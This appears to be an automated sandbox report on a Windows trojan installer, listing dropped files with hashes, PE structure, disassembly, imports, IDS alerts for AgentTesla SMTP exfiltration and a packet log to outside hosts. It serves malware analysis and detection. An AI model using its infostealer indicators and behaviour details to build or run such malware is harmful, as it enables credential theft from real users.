                              SHA1:B4159BD48769E110F77AC738B411ABFB73BE5A16
                              SHA-256:1EE1B8AE17CE30ACC1DCC52DD1B0B569BB336E8D2E67E5DAC944B2D3DE4F0762
                              SHA-512:CFE74620FF111A58B53BF6A495649F556E655C87BA3A4574346975D9A17D52F7140EB0DA76DBFA0D8CD33EE9525674B8BEBCF8E08CD833D66BBFA9229804978B
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):685
                              Entropy (8bit):7.621282940093077
                              Encrypted:false
                              SSDEEP:12:6v/7U+KyobNKxqUPO9/qRw6l2ZK2zirFLDbFJXy+MAg+eElsD8itXaBdHjGGrOKF:N+KyobksUVRqK2+LX/zlsYR3HjGCbx
                              MD5:8C4F73C63672801A4629BA32BFAF9E31
                              SHA1:C59877FEA56A2D45E36389366B0CCBC0AC2B720B
                              SHA-256:DFAFC0CCDCD4A2B74B8F74ECBE0BE82FC9FF3D055A8C9585DD78379DB7F01063
                              SHA-512:E4479DFE6F342212DA86B0B4BE1095162F07F7AE98AC1921CC9ED7BB650E7024CF80D1A82EA99D3744C9127FA046E82C81D4D82D17152D868DD7D1D78ACE20E5
                              Malicious:false
                              Preview:.PNG........IHDR................a...tIDATx.....ki.G.....pm.........c.m.v.....uNr...O......"....\.B.......q.J......|.^^^......g....6..^..NV(..../.wAIi.n.,,.....A~k....5....YwdS.........O/.s.9.k..|v.d......<F.F......z.9 CDn.IzeS.^.w.).V.0.?.._.-.........p?......A.KV..}r...M......<..p......h.hEGg+.Z.$.jx7}LN....,....+...`..-N.6.8....T.T.r.zH.?...@.X...L......fgg..{...........EQq....n.G..{65<.cD)d>.c..V}r.>z.S.D"...[.p.M.4>|.3|..7..j8:.@..5.s.P...N..P..Vi8..<3.g.5...hO..-d..Z.,..........A.Yc..3.5|.Nk.......I.7.*..a..x....2R......sn..0..2...o....Q.)<A..M......%`....P...Q.w. ..G.ggr.F..O5.`.5.(g...7......3l.-d..,..1F..[t.l9.g..FX........IEND.B`.
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):166
                              Entropy (8bit):5.876785121167948
                              Encrypted:false
                              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllZMFnt4UoEw2GUqcklEj9h0XGqV/maXyj2fllljp:6v/lhPysLEnt4UoEwsqckGpq6jy/jp
                              MD5:A008C1D205C5B08639C0A8D8673C6C72
                              SHA1:5190570B97A6F75F1D10D3D1EC6E46AEC8705B0B
                              SHA-256:54A3EBAD22462339574D87D835CA626E039E9B38A625806BAA051F80A327C428
                              SHA-512:AC5F3ED7773C04223650B757F6168FA4F6C57BA4F0C073BD5AB933B96F0FC3AEE918543C4AEA703A9F472045C6FC5CEA012935850F2971A8107772B96F341AB5
                              Malicious:false
                              Preview:.PNG........IHDR................a....sBIT....|.d....]IDAT8.c`..8......>... F...4..u...IJ.....43B.......!..X.D.&rl.5...<...IPO......R..3...W......o2...M`....IEND.B`.
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: Metadefender, Detection: 3%, Browse
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:Windows setup INFormation, Little-endian UTF-16 Unicode text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1292652
                              Entropy (8bit):3.864768543104337
                              Encrypted:false
                              SSDEEP:3072:veHaqq95T1TpRKkYxyZuSkIRipOp1MbSqh43FFc23lRxSsopQfql1Ody29kn1jYF:XaekadZaJiaeQMV
                              MD5:2D947C4C9147622CFC588FC5C17DDDEC
                              SHA1:B367B48D1282E39E37B8992615FF9947DEE8CFED
                              SHA-256:EBB8155AC71DD53258CE3772F189B4771272BA55E15A6DABDE2BEA6896DC2CC3
                              SHA-512:3213B423153A1350AA3A0213079EDF21D77022C7839EB3A905F7EE8A02028E6A572499223889A55C2EF4646C0D3B2CB6DC64E1DCCEF26053EF80D34313EAD885
                              Malicious:false
                              Preview:..;. .*.*. .C.O.P.Y.R.I.G.H.T. .(.C.). .2.0.0.7.-.2.0.1.3. .R.e.a.l.t.e.k. .C.O.R.P.O.R.A.T.I.O.N.....;.....;. .R.e.a.l.t.e.k. .P.C.I.e. .F.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I.e. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;.........[.v.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. . . .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. . . . . . . .=. .N.e.t.....C.l.a.s.s.G.U.I.D. . . .=. .{.4.d.3.6.e.9.7.2.-.e.3.2.5.-.1.1.c.e.-.b.f.c.1.-.0.8.0.0.2.b.e.1.0.3.1.8.}.....P.r.o.v.i.d.e.r. . . . .=. .%.R.e.a.l.t.e.k.%.....D.r.i.v.e.r.V.e.r. . . .=. .0.4./.1.0./.2.0.1.3.,.7...0.7.2...0.4.1.0...2.0.1.3.....C.a.t.a.l.o.g.F.i.l.e...N.T. .=. .r.t.6.4.w.i.n.7...c.a.t.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.R.e.a.l.t.e.k.%.=.R.e.a.l.t.e.k.,. .N.T.a.m.d.6.4.........[.C.o.n.t.r.o.l.F.l.a.g.s.].....E.x.c.l.u.d.e.F.r.o.m.S.e.l.e.c.t. . . . . .=. .*.............[.R.e.a.l.t.e.k...N.T.a.m.d.6.4.].....;. .8.
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):658225
                              Entropy (8bit):6.793682843563435
                              Encrypted:false
                              SSDEEP:12288:rYgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcR:rYgo7AbTc/v4b0h2gqBXnQLGT/Fp0hZO
                              MD5:D7C874B7667F0A6AA61D8BB8D7FB680C
                              SHA1:FC84BD96DEEC372BF30F2EAE236B51F7706E55A8
                              SHA-256:B7F3A9793A8251532790A42CEDE3351935CCFD8B0AE26A4019956D644269B8EB
                              SHA-512:68C0C7E5F23B9557C669E7808D8350A6F08409CE98E37FA3303DBA6B69BACCB9419E6070F46C3BBF826E2136874FCAC4FE4C294F2FDA5F6F98FCA041E75E3AF6
                              Malicious:false
                              Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@..........................`............@.......................................... ..8=...........................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...p...............................rsrc...8=... ...>..................@..@................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:dropped
                              Size (bytes):4730
                              Entropy (8bit):4.970880293743837
                              Encrypted:false
                              SSDEEP:96:VkoIankPYfLoIJomlXTlUxSHtuubQLqJlm0mxmOmTGmVm/mYmY:VkfcMI64RfIubQW/BEjPoKlp
                              MD5:8F7C767AFA41E6D03BDE59296DFF8175
                              SHA1:EEFA541D3A06CAFEB62A535B86D1A95D6AAE1CD6
                              SHA-256:292770B23ED69AF4EDE9255BB66ADF3D3A0FF62D827D2BA05ED2C44A57228ED6
                              SHA-512:FFE75CCD2EFFA74E24955BF36DBD86BB1B30F880D233D8F5C5431E99169224E89E7C59FDD052C6F9544E05CF11FD425F01ADD6E87B512C318132D963CB338B04
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000645">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):208
                              Entropy (8bit):6.572781220141588
                              Encrypted:false
                              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllUxPFp/7l04sR5/7dY+MK6Ie+ed0oxIwsoazRC4I:6v/lhPysIzlZsfdY+MKda8RC4KymCeVp
                              MD5:E2FC23D36F5488D1F2888D524F933582
                              SHA1:335CA8F69FF42E4418F0C95A9626F7B027F62139
                              SHA-256:07AEFFEAC02CD1501C54E5D66ED1816B83AF04E51B1676AF3C4A538FDC9E9E4A
                              SHA-512:EA3B15A24F8B3FF83DE6ABB7392A0672A55F1F87DDC485B2AD517E76B48358C852484CF2D23FD7989992676AF73640D6CC2002FD2F0FD2EAA29C39C7DFE503BA
                              Malicious:false
                              Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..1.. .E..@v....P...........8.O.......w4@.8`..I.I....0...&y..../9..r....5..@....P.+..l..*..8..~...@....p...y.#0)....o...fq....>....S.^&.n....IEND.B`.
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):3.964735178725505
                              Encrypted:false
                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                              MD5:9F754B47B351EF0FC32527B541420595
                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                              Malicious:false
                              Preview:NordVPN directory not found!..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):6.793691216814324
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:SecuriteInfo.com.Trojan.Inject.11626.exe
                              File size:658225
                              MD5:dd43bd8cdc55dd9c8a168f7d5e67db30
                              SHA1:b7b49d8b277b6cb3d3006e912ad78558872119fb
                              SHA256:7dc00d4ca525d39db7c57bcbcf2a17720f3e1d2eaecfc714f5e28f0e2a09633b
                              SHA512:445e59a9fd2b4a0361772e6865866aee8511e583c0771b16c8e48d32940eecafa2baa05645fd5b5e4b0f75d78f57e6548304b04be241cc25dead38c4a77583ae
                              SSDEEP:12288:0YgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcR:0Ygo7AbTc/v4b0h2gqBXnQLGT/Fp0hZO
                              TLSH:66E418B2A130868AD5E91EF25E5AB93091B22C7CDCE2110DA9F6370DD6F231145DEB4F
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                              Icon Hash:ac9eb23233b28eaa
                              Entrypoint:0x403640
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:61259b55b8912888e90f516ca08dc514
                              Instruction
                              push ebp
                              mov ebp, esp
                              sub esp, 000003F4h
                              push ebx
                              push esi
                              push edi
                              push 00000020h
                              pop edi
                              xor ebx, ebx
                              push 00008001h
                              mov dword ptr [ebp-14h], ebx
                              mov dword ptr [ebp-04h], 0040A230h
                              mov dword ptr [ebp-10h], ebx
                              call dword ptr [004080C8h]
                              mov esi, dword ptr [004080CCh]
                              lea eax, dword ptr [ebp-00000140h]
                              push eax
                              mov dword ptr [ebp-0000012Ch], ebx
                              mov dword ptr [ebp-2Ch], ebx
                              mov dword ptr [ebp-28h], ebx
                              mov dword ptr [ebp-00000140h], 0000011Ch
                              call esi
                              test eax, eax
                              jne 00007FE7A4A38BDAh
                              lea eax, dword ptr [ebp-00000140h]
                              mov dword ptr [ebp-00000140h], 00000114h
                              push eax
                              call esi
                              mov ax, word ptr [ebp-0000012Ch]
                              mov ecx, dword ptr [ebp-00000112h]
                              sub ax, 00000053h
                              add ecx, FFFFFFD0h
                              neg ax
                              sbb eax, eax
                              mov byte ptr [ebp-26h], 00000004h
                              not eax
                              and eax, ecx
                              mov word ptr [ebp-2Ch], ax
                              cmp dword ptr [ebp-0000013Ch], 0Ah
                              jnc 00007FE7A4A38BAAh
                              and word ptr [ebp-00000132h], 0000h
                              mov eax, dword ptr [ebp-00000134h]
                              movzx ecx, byte ptr [ebp-00000138h]
                              mov dword ptr [0042A318h], eax
                              xor eax, eax
                              mov ah, byte ptr [ebp-0000013Ch]
                              movzx eax, ax
                              or eax, ecx
                              xor ecx, ecx
                              mov ch, byte ptr [ebp-2Ch]
                              movzx ecx, cx
                              shl eax, 10h
                              or eax, ecx
                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x63d38.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .ndata0x2b0000x270000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x520000x63d380x63e00False0.295598990926data5.64645184571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountry
                              RT_BITMAP0x523d00x368dataEnglishUnited States
                              RT_ICON0x527380x4180cdataEnglishUnited States
                              RT_ICON0x93f480x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                              RT_ICON0xa47700x94a8dataEnglishUnited States
                              RT_ICON0xadc180x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                              RT_ICON0xb1e400x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 95EnglishUnited States
                              RT_ICON0xb43e80x988dataEnglishUnited States
                              RT_ICON0xb4d700x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                              RT_DIALOG0xb51d80xb8dataEnglishUnited States
                              RT_DIALOG0xb52900x144dataEnglishUnited States
                              RT_DIALOG0xb53d80x13cdataEnglishUnited States
                              RT_DIALOG0xb55180x100dataEnglishUnited States
                              RT_DIALOG0xb56180x11cdataEnglishUnited States
                              RT_DIALOG0xb57380x60dataEnglishUnited States
                              RT_GROUP_ICON0xb57980x68dataEnglishUnited States
                              RT_VERSION0xb58000x1f4dataEnglishUnited States
                              RT_MANIFEST0xb59f80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                              DLLImport
                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                              DescriptionData
                              ProductNameWadiesant
                              FileDescriptionUnpackagedfotomo
                              FileVersion19.29.0
                              CommentsCHONDROITI
                              CompanyNameConteketra
                              Translation0x0409 0x04b0
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              192.168.11.2045.10.148.33497635872030171 05/27/22-19:42:44.865082TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49763587192.168.11.2045.10.148.33
                              192.168.11.2045.10.148.33497635872840032 05/27/22-19:42:44.865135TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249763587192.168.11.2045.10.148.33
                              192.168.11.20185.222.57.7949754802018752 05/27/22-19:41:07.264505TCP2018752ET TROJAN Generic .bin download from Dotted Quad4975480192.168.11.20185.222.57.79
                              TimestampSource PortDest PortSource IPDest IP
                              May 27, 2022 19:41:07.246526003 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.259922028 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.260132074 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.264504910 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.278637886 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.278716087 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.278772116 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.278786898 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.278795958 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.278893948 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.279021025 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.292305946 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292381048 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292438030 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292452097 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.292453051 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292480946 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292500973 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292515993 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292530060 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292540073 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.292548895 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.292603016 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.292692900 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.305855036 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.305934906 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.305948019 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306005955 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306052923 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306139946 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306189060 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306194067 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306231022 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306245089 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306257010 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306271076 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306284904 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306298971 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306309938 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306313992 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306322098 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306332111 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306340933 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306350946 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306358099 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306364059 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306372881 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306380033 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.306407928 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306505919 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.306555986 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.319349051 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319432974 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319442987 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319567919 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.319616079 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.319740057 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319849968 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319890976 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.319909096 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319924116 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319947958 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319962025 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319977045 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.319989920 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.319991112 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320000887 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320097923 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.320113897 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320130110 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320167065 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320180893 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320200920 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320215940 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320224047 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.320230007 CEST8049754185.222.57.79192.168.11.20
